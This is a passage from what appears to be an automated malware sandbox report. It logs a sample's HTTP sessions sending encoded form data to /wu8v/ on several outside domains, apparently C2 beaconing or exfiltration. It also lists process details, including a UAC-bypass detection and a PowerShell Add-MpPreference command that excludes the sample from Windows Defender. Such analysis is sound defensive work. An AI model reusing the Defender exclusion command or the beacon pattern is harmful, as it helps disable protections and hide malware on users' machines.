May 8, 2024 14:08:17.568939924 CEST | 1289 | IN | Data Raw: 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 20 0a 3c 64 69 76
                                                                                                                    Data Ascii: :#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is tempor
May 8, 2024 14:08:17.568953037 CEST | 1289 | IN | Data Raw: 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c
                                                                                                                    Data Ascii: Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></t
May 8, 2024 14:08:17.898473024 CEST | 9 | IN | Data Raw: 3c 2f 68 74 6d 6c 3e 20 0a
                                                                                                                    Data Ascii: </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49786 | 62.149.128.40 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:08:20.099442005 CEST | 7734 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.insertcoen.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.insertcoen.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.insertcoen.com/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=uXEjkQ3q0ZXw3D94DHLXGNC1NK8G9fNKhb3h/O1qKSjvpwge7zdaFpaawweHsGYL/0/pmps+cWhuuItxLEqozYXRkH5z7a6CkLND2uIngYaI60+BlvJO4vdMYJN9DaRjCI3Dx9Qgu5L+6zBl8X4Y/aii6zjIilLCUOijwFt0+XkM34YDT4WtW7IgeWq84BMpw4B332AZ09FBZ40pzq4w5bxghWRYBwxij+antdjhtHJun7oCpPnOXUgdEyUeFUik6MBXMC9c22qLxdog5Ut0q47XIV/8np0PB0/yvKUbn0Sj0DNA5Fe8YYB+tyWx3uuGpsLokAd34yMjyqZs54gaw1DsaonDjLUKvRYJgCjPUmHatTJy4rnZk6DBE1qCnQcizHn8LJK2dla08/BvNeh/QXW6vKbBKlufD6fL122hUfKezJYYV+oPisL05Iisfj7qWNTaQUP0ezial8vU05HKTZ3YoRdgxwidUJAJBgyBiBiQXIBiKzEA38l43VSA0MQLdvRpUd5Mld+DnEQcRYjggV8ugARUSXb8+169F62TIGeYbGCx3RGRw4qsn6ZLFvRf4N6S545meS1ZWDNYdG3AWXszvjyBTCzRfIrDm0AEHmQ8sxMIuX7EVpP3rIhG0jfTuZ+ukMTl0oGs4d1Ecx5HW/z97jxjVbNajmgrOP/KVMgBAF0gQJTG+G06+QzYEBADCXcdZ1rhZyiILM5REysD/tJNWiQ8BetQy1LtroTA78dRuhSmpYHNnhpdEx1WSoWLUiTnH8tXaFTL8TSS29ZC2IxDQSmARLLR4+jpFvHXhh+/dq+4aikSGHHLRnfUbx9KjcQQTazokL43x1+GUVBPCDjBspNMToPq6C0t5MQLyx1SdjyiaTxJ+HKamw2+E4SWZFbj5egUPHRVnEIZptQc2BWZfpvpyk5it5oBYWF4mm0BrZtDjTsyJDJ9FKuv73qDNbg7Ku/Gp7tQM59eytOQl3SIlCM4CUGKxSwOZl7uBTli [TRUNCATED]
May 8, 2024 14:08:20.429464102 CEST | 3092 | OUT | Data Raw: 4a 72 68 65 4f 5a 4b 55 45 2b 37 70 6f 35 45 76 34 66 63 56 65 5a 4e 4c 65 69 45 37 33 2f 71 6b 54 51 63 7a 4f 43 61 70 31 78 56 73 78 4d 58 56 6e 2f 58 53 4d 62 66 53 4f 42 41 65 35 55 7a 4c 71 33 56 74 43 6d 71 42 61 37 31 64 69 6e 4b 76 6a 7a
                                                                                                                    Data Ascii: JrheOZKUE+7po5Ev4fcVeZNLeiE73/qkTQczOCap1xVsxMXVn/XSMbfSOBAe5UzLq3VtCmqBa71dinKvjzT7CVKSwMjqlDaFRAZTmIV1DbBnHLnic+OL1kCYa24ESUvUX8XaD3nNN7TuovM+fZ8FlQI11l8VgLsi80+r8mX8PrmQcwpMxQn/i8vWKJzIMu7f3c5j93IeBfnvQt4Q1Xql+eI9mEOkAwSeYVs4X1lSoKr3NLQC4EE
May 8, 2024 14:08:20.761182070 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Cache-Control: private
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:08:20 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 4947
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0; [TRUNCATED]
May 8, 2024 14:08:20.761195898 CEST | 1289 | IN
                                                                                                                    Data Ascii: :#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
May 8, 2024 14:08:20.761214972 CEST | 1289 | IN
                                                                                                                    Data Ascii: :#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is tempor
May 8, 2024 14:08:20.761228085 CEST | 1289 | IN
                                                                                                                    Data Ascii: Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></t
May 8, 2024 14:08:21.091331005 CEST | 9 | IN
                                                                                                                    Data Ascii: </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49787 | 62.149.128.40 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:08:22.950635910 CEST | 457 | OUT | GET /wu8v/?MdtlcTm=jVsDngfN17jo53xCVVHLBYy1RtgDvNhrjbHy79NIDh3y3n8I8UoARbyDj0OI5nlukHb+wqYtKmURqZRRAHON04+Cmz5V6OWL/4It3e8ivry7nxqUmvN5lOs=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.insertcoen.com
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
May 8, 2024 14:08:23.281723022 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Cache-Control: private
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Server: Microsoft-IIS/8.5
                                                                                                                    X-Powered-By: ASP.NET
                                                                                                                    Date: Wed, 08 May 2024 12:08:23 GMT
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 5097
                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0; [TRUNCATED]
May 8, 2024 14:08:23.281857967 CEST | 1289 | IN
                                                                                                                    Data Ascii: :#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;}
May 8, 2024 14:08:23.281960011 CEST | 1289 | IN
                                                                                                                    Data Ascii: :#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is tempor
May 8, 2024 14:08:23.281971931 CEST | 1289 | IN
                                                                                                                    Data Ascii: Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></t
May 8, 2024 14:08:23.615241051 CEST | 159 | IN
                                                                                                                    Data Ascii: soft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,9600">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49788 | 137.220.252.40 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:08:38.089293003 CEST | 715 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.387mfyr.sbs
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.387mfyr.sbs
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.387mfyr.sbs/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=XPGv5AZu+rCoILffgwoV2VJlYGwIMmXdLAv6ONDmT6Hm/beFMbtXJonSFYG1WUq2JNOLm179ymFGiJoil5CarYNkLI0CTKhr5k/4lHIA6Xt8492gcRXOz0KoIydsYuUZ7ROEjfBc7KaCRBXhlOUxTBTM66vWdHzm7kxrfG+GnObBT9h8Jl/DC07SkFqo0gvKDQ==
May 8, 2024 14:08:38.361881018 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:08:38 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 548
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49789 | 137.220.252.40 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:08:41.099900007 CEST | 735 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.387mfyr.sbs
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.387mfyr.sbs
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.387mfyr.sbs/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=XPGv5AZu+rCoJqPfmhoVz1JmdGwIWWWaLAz6OPv2UPXm/6CFLatXKonSK4GwSUq5JNSlm3v9yl5GiIYilICdqINmEo0cZqhr5k/4lDgm6Xl84MmgezzB6UKrfCdsJ+VQ7ROijbA37MeCRDPhmfUyZBTK1auUVGDtyE9hSmyH5eHCW7wmYUeUQ0fh5Cjc5jSDYQ6Ug/tfR994MvZ2ezemm3M=
May 8, 2024 14:08:41.374042034 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:08:41 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 548
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
47 | 192.168.2.4 | 49790 | 137.220.252.40 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:08:43.915498972 CEST | 10817 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.387mfyr.sbs
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.387mfyr.sbs
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.387mfyr.sbs/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Data Ascii: MdtlcTm= [TRUNCATED]
May 8, 2024 14:08:44.187978029 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:08:44 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 548
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
48 | 192.168.2.4 | 49791 | 137.220.252.40 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
Timestamp | Bytes transferred | Direction | Data
May 8, 2024 14:08:46.724365950 CEST | 454 | OUT | GET /wu8v/?MdtlcTm=aNuP63JR+qvwCLW62wwN2gNqXDVrMTryMQjODMfsZKfQm/+YFqgnBKvcT5agT2uiD/O4mE7g0mgXxPpAo7asqKVpcckEa+9XwCnOtQUj6EFGuNumSA/i+x0=&_X=ClAdyH4P7rA8z HTTP/1.1
                                                                                                                    Host: www.387mfyr.sbs
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    May 8, 2024 14:08:46.994688034 CEST | 691 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Wed, 08 May 2024 12:08:46 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 548
                                                                                                                    Connection: close
                                                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    49 | 192.168.2.4 | 49792 | 91.195.240.123 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:08:52.767493010 CEST | 706 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.lm2ue.us
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.lm2ue.us
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 204
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.lm2ue.us/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=uap0R1Vo/aCNXayX0a5wLVKfGPnhz6k9/LYkleRcKfCKcVPtKalsKQL/oqk1i3x219LtvDk3I67lD3c0KdF29y8Z69QFvHwJMtgun93GTJCqYqIP/owIsNOrI88Y8isIgxUeMk6JIYlU97Tk1htm3IluuS35MJw8VDE+ltWSyJ8l9Sh+9tYjaBqaQhQaoTtC2A==
                                                                                                                    May 8, 2024 14:08:53.079268932 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                    date: Wed, 08 May 2024 12:08:52 GMT
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 556
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                    50 | 192.168.2.4 | 49793 | 91.195.240.123 | 80 | 2132 | C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:08:58.007967949 CEST | 726 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.lm2ue.us
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.lm2ue.us
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 224
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.lm2ue.us/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm=uap0R1Vo/aCNX6CXnr5wDVKcDPnhkqkh/LkklfUXKNWKcwLtYJ9sNQL/jKkwoXxL19HlvCo3I6/lDzU0JqR1yC8b3dQHinwJMtgun9j4TJaqYb4P+NQPtNOsYs8YqSsMgxVNMmPkIdpU97jk7S1h8Ilgjy3tNLdRN2NTmM/wz5kI10wksc50IBOpNmZulQQLtPdD7roNS25eFreu3GRbkqQ=
                                                                                                                    May 8, 2024 14:08:58.320055962 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                    date: Wed, 08 May 2024 12:08:58 GMT
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 556
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                    51 | 192.168.2.4 | 49794 | 91.195.240.123 | 80
                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                    May 8, 2024 14:09:01.183187962 CEST | 10808 | OUT | POST /wu8v/ HTTP/1.1
                                                                                                                    Host: www.lm2ue.us
                                                                                                                    Accept: */*
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                    Origin: http://www.lm2ue.us
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 10304
                                                                                                                    Connection: close
                                                                                                                    Referer: http://www.lm2ue.us/wu8v/
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                                    Data Ascii: MdtlcTm= [TRUNCATED]
                                                                                                                    May 8, 2024 14:09:01.495297909 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                    date: Wed, 08 May 2024 12:09:01 GMT
                                                                                                                    content-type: text/html
                                                                                                                    content-length: 556
                                                                                                                    server: NginX
                                                                                                                    connection: close
                                                                                                                    Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                    Target ID:0
                                                                                                                    Start time:14:04:49
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Users\user\Desktop\NdYuOgHbM9.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Users\user\Desktop\NdYuOgHbM9.exe"
                                                                                                                    Imagebase:0x1ef38c40000
                                                                                                                    File size:849'277 bytes
                                                                                                                    MD5 hash:664EDDACB00D2D58F85CDC2913A1680E
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    Reputation:low
                                                                                                                    Has exited:true

                                                                                                                    Target ID:1
                                                                                                                    Start time:14:04:49
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                    File size:862'208 bytes
                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:2
                                                                                                                    Start time:14:04:51
                                                                                                                    Start date:08/05/2024
                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force
                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                    File size:452'608 bytes
                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high
                                                                                                                    Has exited:true

                                                                                                                    Target ID:3
                                                                                                                    Start time:14:04:52
